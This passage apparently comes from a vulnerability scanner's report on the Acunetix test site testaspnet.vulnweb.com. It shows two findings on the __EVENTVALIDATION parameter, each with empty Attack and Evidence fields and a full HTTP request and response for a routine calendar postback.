style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8474&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAYTjoJNsIZGRk2JHMZHUpsGlil5b3Nlhm1PTeqok%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKc17ObAgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJHmjsZB5fDS2CFSRSl%2BFnjB7rzYs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:47 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAYTjoJNsIZGRk2JHMZHUpsGlil5b3Nlhm1PTeqok=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKc17ObAgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJHmjsZB5fDS2CFSRSl+FnjB7rzYs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:White" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8200&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAMtOYTdoIZGRkuH5Mfcuev3bPYoGoYzrBVcBMiLw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcifT4BgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92p0ME8SklQw5ep8m%2FTMSd%2BksJIA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:01 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAMtOYTdoIZGRkuH5Mfcuev3bPYoGoYzrBVcBMiLw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcifT4BgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92p0ME8SklQw5ep8m/TMSd+ksJIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:White" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> 